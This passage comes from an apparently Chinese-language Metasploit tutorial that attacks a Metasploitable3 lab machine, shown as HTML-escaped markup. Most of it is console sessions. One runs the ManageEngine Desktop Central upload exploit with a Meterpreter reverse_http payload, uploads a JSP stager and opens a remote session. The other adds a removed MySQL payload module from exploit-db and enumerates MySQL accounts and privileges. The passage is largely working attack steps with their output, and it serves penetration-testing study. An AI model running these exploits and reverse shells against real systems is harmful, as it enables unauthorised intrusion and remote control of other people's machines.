                                                              13<\/span> exploit\/windows\/http\/manageengine_connectionid_write<\/span> 2015-12-14 <\/span>excellent<\/span> Yes<\/span> ManageEngine<\/span> Desktop<\/span> Central<\/span> 9<\/span> FileUploadServlet<\/span> ConnectionId<\/span> Vulnerability<\/span><\/div>\n<\/div>\n<\/li>\n
                                                            22. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              14<\/span> exploit\/windows\/misc\/manageengine_eventlog_analyzer_rce<\/span> 2015-07-11 <\/span>manual<\/span> Yes<\/span> ManageEngine<\/span> EventLog<\/span> Analyzer<\/span> Remote<\/span> Code<\/span> Execution<\/span><\/div>\n<\/div>\n<\/li>\n
                                                            23. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              <\/div>\n<\/div>\n<\/li>\n
                                                            24. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              <\/div>\n<\/div>\n<\/li>\n
                                                            25. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              msf5<\/span> exploit(multi\/http\/jenkins_script_console)<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                                            26. \n
                                                              \n
                                                              <\/div>\n<\/div>\n
                                                              \n
                                                              \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                              <\/code><\/pre>\n
                                                              <\/code><\/pre>\n
                                                                \n
                                                              1. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                msf5<\/span> exploit(multi\/http\/jenkins_script_console)<\/span> ><\/span> use<\/span> exploit\/windows\/http\/manageengine_connectionid_write<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              2. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                msf5<\/span> exploit(windows\/http\/manageengine_connectionid_write)<\/span> ><\/span> set<\/span> PAYLOAD<\/span> windows\/meterpreter\/reverse_http<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              3. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                PAYLOAD<\/span> =><\/span> windows\/meterpreter\/reverse_http<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              4. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                msf5<\/span> exploit(windows\/http\/manageengine_connectionid_write)<\/span> ><\/span> set<\/span> LHOST<\/span> 192.168<\/span>.177<\/span>.143<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              5. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                LHOST<\/span> =><\/span> 192.168<\/span>.177<\/span>.143<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              6. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                msf5<\/span> exploit(windows\/http\/manageengine_connectionid_write)<\/span> ><\/span> exploit<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              7. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                <\/div>\n<\/div>\n<\/li>\n
                                                              8. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                [-<\/span>] Exploit failed: The following options failed to validate:<\/span> RHOSTS.<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              9. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                [*<\/span>] Exploit<\/span> completed,<\/span> but<\/span> no<\/span> session<\/span> was<\/span> created.<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              10. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                msf5<\/span> exploit(windows\/http\/manageengine_connectionid_write)<\/span> ><\/span> set<\/span> RHOSTS<\/span> 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              11. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                RHOSTS<\/span> =><\/span> 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              12. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                msf5<\/span> exploit(windows\/http\/manageengine_connectionid_write)<\/span> ><\/span> exploit<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              13. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                <\/div>\n<\/div>\n<\/li>\n
                                                              14. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                [*<\/span>] Started<\/span> HTTP<\/span> reverse<\/span> handler<\/span> on<\/span> http:\/\/192.168.177.143:8080<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              15. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                [*<\/span>] Creating<\/span> JSP<\/span> stager<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              16. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                [*<\/span>] Uploading<\/span> JSP<\/span> stager<\/span> uBzAP.jsp...<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              17. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                [*<\/span>] Executing<\/span> stager...<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              18. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                [*<\/span>] http:\/\/192.168.177.143:8080<\/span> handling<\/span> request<\/span> from<\/span> 192.168<\/span>.177<\/span>.144<\/span>;<\/span> (UUID:<\/span> tsqgh8zb)<\/span> Staging<\/span> x86<\/span> payload<\/span> (180825<\/span> bytes)<\/span> ...<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              19. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                [*<\/span>] Meterpreter<\/span> session<\/span> 3<\/span> opened<\/span> (192.168.177.143:8080<\/span> -><\/span> 192.168<\/span>.177<\/span>.144<\/span>:49632)<\/span> at<\/span> 2019-04-26 17:39:09<\/span> +0800<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              20. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                [!]<\/span> This<\/span> exploit<\/span> may<\/span> require<\/span> manual<\/span> cleanup<\/span> of<\/span> '..\/webapps\/DesktopCentral\/jspf\/uBzAP.jsp'<\/span> on<\/span> the<\/span> target<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              21. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                <\/div>\n<\/div>\n<\/li>\n
                                                              22. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                meterpreter<\/span> > <\/span><\/div>\n<\/div>\n<\/li>\n
                                                              23. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                meterpreter > getuid<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              24. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                Server username: NT AUTHORITY\\LOCAL SERVICE<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              25. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                meterpreter > sysinfo<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              26. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                Computer : METASPLOITABLE3<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              27. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                OS : Windows 2008 R2 (Build 7601, Service Pack 1).<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              28. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                Architecture : x64<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              29. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                System Language : en_US<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              30. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                Domain : WORKGROUP<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              31. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                Logged On Users : 2<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              32. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                Meterpreter : x86\/windows<\/span><\/div>\n<\/div>\n<\/li>\n
                                                              33. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                meterpreter ><\/span><\/div>\n<\/div>\n<\/li>\n
                                                              34. \n
                                                                \n
                                                                <\/div>\n<\/div>\n
                                                                \n
                                                                \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                <\/code><\/pre>\n
                                                                5\u3001\u5229\u7528\u516c\u7528\u670d\u52a1<\/h4>\n
                                                                \u5728\u6f0f\u6d1e\u653b\u51fb\u65f6\uff0c\u6709\u4e9b\u670d\u52a1\u8ddf\u76ee\u6807\u4e0a\u5176\u4ed6\u5927\u90e8\u5206\u670d\u52a1\u90fd\u6709\u5173\u7cfb\uff0c\u800c\u5927\u591a\u6570\u662f\u60c5\u51b5\u4e0b\u5b83\u4eec\u88ab\u5ffd\u89c6\u4e86\u3002<\/p>\n
                                                                \u51c6\u5907\u5de5\u4f5c<\/h5>\n
                                                                \u5728\u672c\u8282\u4e2d\uff0c\u6211\u4eec\u5c06\u5229\u7528\u76ee\u6807\u73af\u5883\u4e2d\u6700\u5e38\u89c1\u548c\u6700\u5bb9\u6613\u88ab\u6ee5\u7528\u7684\u670d\u52a1-Mysql<\/code>\u3002\u5927\u591a\u6570\u60c5\u51b5\u4e0b\uff0c\u6211\u4eec\u53ef\u4ee5\u5229\u7528Mysql<\/code>\u670d\u52a1\uff0c\u56e0\u4e3a\u5b83\u4eec\u662f\u51fa\u4e8e\u5f00\u53d1\u76ee\u7684\u5b89\u88c5\u7684\u3002\u5ffd\u7565\u4e86\u4e00\u4e9b\u5b89\u5168\u52a0\u56fa\u3002\u6bd4\u5982\u8bbe\u7f6eroot<\/code>\u5bc6\u7801\u6216\u8005\u8bbe\u7f6e\u5f3a\u5bc6\u7801\u3002<\/p>\n
                                                                \u672c\u8282\u6211\u4eec\u5c06\u4f7f\u7528Metasploitable3<\/code>\u4f5c\u4e3a\u9776\u673a<\/p>\n
                                                                \u600e\u4e48\u505a<\/h5>\n
                                                                \u8981\u5229\u7528\u76ee\u6807\u7684Mysql<\/code>\u670d\u52a1\uff0c\u6211\u4eec\u5148\u4f7f\u7528MySQL<\/code>\u679a\u4e3e\u6a21\u5757\u679a\u4e3e\u76ee\u6807\uff0c\u7136\u540e\u4f7f\u7528Oracle MySQL for the Microsoft Windows Payload<\/code>\u653b\u51fb\u6a21\u5757\u83b7\u53d6\u8fdc\u7a0b\u4e3b\u673a\u7684shell<\/code>\u3002<\/p>\n
                                                                TIP\uff1amysql_paylod<\/code>\u6a21\u5757\u5728\u65b0\u7248\u7684Metasploit<\/code>\u4e2d\u88ab\u79fb\u9664\u4e86\u3002\u4e0d\u8fc7\u4f60\u53ef\u4ee5\u4ece\u00a0https:\/\/www.exploit-db.com\/download\/16957<\/code>\u4e0b\u8f7d\u8fd9\u4e2a\u6a21\u5757\uff0c\u653e\u5230Metasploit<\/code>\u5bf9\u5e94\u7684\u6a21\u5757\u76ee\u5f55\u4e2d(\/usr\/share\/metasploit-framework\/modules\/exploits\/windows\/mysql<\/code>)\uff0c\u4fee\u6539\u4ee3\u7801\u7684\u524d\u9762\u51e0\u884c\u4e3a\u5982\u4e0b\u5185\u5bb9\u5c31\u884c\u3002<\/p>\n
                                                                <\/code><\/pre>\n
                                                                  \n
                                                                1. \n
                                                                  \n
                                                                  <\/div>\n<\/div>\n
                                                                  \n
                                                                  ## <\/span><\/div>\n<\/div>\n<\/li>\n
                                                                2. \n
                                                                  \n
                                                                  <\/div>\n<\/div>\n
                                                                  \n
                                                                  # $Id: mysql_payload.rb 11899 2011-03-08 22:42:26Z todb $ <\/span><\/div>\n<\/div>\n<\/li>\n
                                                                3. \n
                                                                  \n
                                                                  <\/div>\n<\/div>\n
                                                                  \n
                                                                  ## <\/span><\/div>\n<\/div>\n<\/li>\n
                                                                4. \n
                                                                  \n
                                                                  <\/div>\n<\/div>\n
                                                                  \n
                                                                  <\/div>\n<\/div>\n<\/li>\n
                                                                5. \n
                                                                  \n
                                                                  <\/div>\n<\/div>\n
                                                                  \n
                                                                  ## <\/span><\/div>\n<\/div>\n<\/li>\n
                                                                6. \n
                                                                  \n
                                                                  <\/div>\n<\/div>\n
                                                                  \n
                                                                  # This file is part of the Metasploit Framework and may be subject to <\/span><\/div>\n<\/div>\n<\/li>\n
                                                                7. \n
                                                                  \n
                                                                  <\/div>\n<\/div>\n
                                                                  \n
                                                                  # redistribution and commercial restrictions. Please see the Metasploit <\/span><\/div>\n<\/div>\n<\/li>\n
                                                                8. \n
                                                                  \n
                                                                  <\/div>\n<\/div>\n
                                                                  \n
                                                                  # Framework web site for more information on licensing and terms of use. <\/span><\/div>\n<\/div>\n<\/li>\n
                                                                9. \n
                                                                  \n
                                                                  <\/div>\n<\/div>\n
                                                                  \n
                                                                  # http:\/\/metasploit.com\/framework\/ <\/span><\/div>\n<\/div>\n<\/li>\n
                                                                10. \n
                                                                  \n
                                                                  <\/div>\n<\/div>\n
                                                                  \n
                                                                  ## <\/span><\/div>\n<\/div>\n<\/li>\n
                                                                11. \n
                                                                  \n
                                                                  <\/div>\n<\/div>\n
                                                                  \n
                                                                  <\/div>\n<\/div>\n<\/li>\n
                                                                12. \n
                                                                  \n
                                                                  <\/div>\n<\/div>\n
                                                                  \n
                                                                  require<\/span> 'msf\/core'<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                13. \n
                                                                  \n
                                                                  <\/div>\n<\/div>\n
                                                                  \n
                                                                  <\/div>\n<\/div>\n<\/li>\n
                                                                14. \n
                                                                  \n
                                                                  <\/div>\n<\/div>\n
                                                                  \n
                                                                  class<\/span> MetasploitModule<\/span> < Msf::Exploit::Remote<\/span> <\/span><\/div>\n<\/div>\n<\/li>\n
                                                                15. \n
                                                                  \n
                                                                  <\/div>\n<\/div>\n
                                                                  \n
                                                                  Rank = ExcellentRanking<\/div>\n<\/div>\n<\/li>\n
                                                                16. \n
                                                                  \n
                                                                  <\/div>\n<\/div>\n
                                                                  \n
                                                                  <\/div>\n<\/div>\n<\/li>\n
                                                                17. \n
                                                                  \n
                                                                  <\/div>\n<\/div>\n
                                                                  \n
                                                                  include<\/span> Msf::Exploit::Remote::MYSQL<\/div>\n<\/div>\n<\/li>\n
                                                                18. \n
                                                                  \n
                                                                  <\/div>\n<\/div>\n
                                                                  \n
                                                                  include<\/span> Msf::Exploit::CmdStager<\/div>\n<\/div>\n<\/li>\n
                                                                19. \n
                                                                  \n
                                                                  <\/div>\n<\/div>\n
                                                                  \n
                                                                  <\/div>\n<\/div>\n<\/li>\n
                                                                20. \n
                                                                  \n
                                                                  <\/div>\n<\/div>\n
                                                                  \n
                                                                  \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                  <\/code><\/pre>\n
                                                                  \u679a\u4e3e\uff1a<\/p>\n
                                                                  <\/code><\/pre>\n
                                                                    \n
                                                                  1. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    msf5 auxiliary(admin\/mysql\/<\/span>mysql_enum) > use auxiliary\/admin\/<\/span>mysql\/mysql_enum<\/div>\n<\/div>\n<\/li>\n
                                                                  2. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    msf5 auxiliary(admin\/mysql\/<\/span>mysql_enum) > set RHOSTS 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  3. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    RHOSTS => 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  4. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    msf5 auxiliary(admin\/mysql\/<\/span>mysql_enum) > set USERNAME root<\/div>\n<\/div>\n<\/li>\n
                                                                  5. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    USERNAME => root<\/div>\n<\/div>\n<\/li>\n
                                                                  6. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    msf5 auxiliary(admin\/mysql\/<\/span>mysql_enum) > run<\/div>\n<\/div>\n<\/li>\n
                                                                  7. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] Running module against 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  8. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    <\/div>\n<\/div>\n<\/li>\n
                                                                  9. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - Running MySQL Enumerator...<\/div>\n<\/div>\n<\/li>\n
                                                                  10. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - Enumerating Parameters<\/div>\n<\/div>\n<\/li>\n
                                                                  11. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - MySQL Version:<\/span> 5.5<\/span>.20<\/span>-log<\/div>\n<\/div>\n<\/li>\n
                                                                  12. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - Compiled for<\/span> the following OS:<\/span> Win64<\/div>\n<\/div>\n<\/li>\n
                                                                  13. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - Architecture:<\/span> x86<\/div>\n<\/div>\n<\/li>\n
                                                                  14. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - Server Hostname:<\/span> metasploitable3<\/div>\n<\/div>\n<\/li>\n
                                                                  15. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - Data Directory:<\/span> c:<\/span>\\wamp\\bin\\mysql\\mysql5.5<\/span>.20<\/span>\\data\\<\/div>\n<\/div>\n<\/li>\n
                                                                  16. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - Logging of queries and logins:<\/span> OFF<\/div>\n<\/div>\n<\/li>\n
                                                                  17. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - Old Password Hashing Algorithm OFF<\/div>\n<\/div>\n<\/li>\n
                                                                  18. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - Loading of local files:<\/span> ON<\/div>\n<\/div>\n<\/li>\n
                                                                  19. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - Deny logins with old Pre-4.1<\/span> Passwords:<\/span> OFF<\/div>\n<\/div>\n<\/li>\n
                                                                  20. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - Allow Use of symlinks for<\/span> Database Files:<\/span> YES<\/div>\n<\/div>\n<\/li>\n
                                                                  21. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - Allow Table Merge:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  22. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - SSL Connection:<\/span> DISABLED<\/div>\n<\/div>\n<\/li>\n
                                                                  23. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - Enumerating Accounts:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  24. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - List of Accounts with Password Hashes:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  25. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [+] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> localhost Password Hash:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  26. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [+] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> 127.0<\/span>.0<\/span>.1<\/span> Password Hash:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  27. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [+] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> ::1<\/span> Password Hash:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  28. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [+] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> Host:<\/span> localhost Password Hash:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  29. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [+] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> % Password Hash:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  30. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - The following users have GRANT Privilege:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  31. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n
                                                                  32. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> 127.0<\/span>.0<\/span>.1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  33. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> ::1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  34. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - The following users have CREATE USER Privilege:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  35. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n
                                                                  36. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> 127.0<\/span>.0<\/span>.1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  37. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> ::1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  38. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> %<\/div>\n<\/div>\n<\/li>\n
                                                                  39. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - The following users have RELOAD Privilege:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  40. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n
                                                                  41. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> 127.0<\/span>.0<\/span>.1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  42. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> ::1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  43. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> %<\/div>\n<\/div>\n<\/li>\n
                                                                  44. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - The following users have SHUTDOWN Privilege:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  45. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n
                                                                  46. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> 127.0<\/span>.0<\/span>.1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  47. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> ::1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  48. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> %<\/div>\n<\/div>\n<\/li>\n
                                                                  49. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - The following users have SUPER Privilege:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  50. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n
                                                                  51. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> 127.0<\/span>.0<\/span>.1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  52. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> ::1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  53. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> %<\/div>\n<\/div>\n<\/li>\n
                                                                  54. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - The following users have FILE Privilege:<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  55. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n
                                                                  56. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
                                                                    [*] 192.168<\/span>.177<\/span>.144<\/span>:3306<\/span> - User:<\/span> root Host:<\/span> 127.0<\/span>.0<\/span>.1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                  57. \n
                                                                    \n
                                                                    <\/div>\n<\/div>\n
                                                                    \n
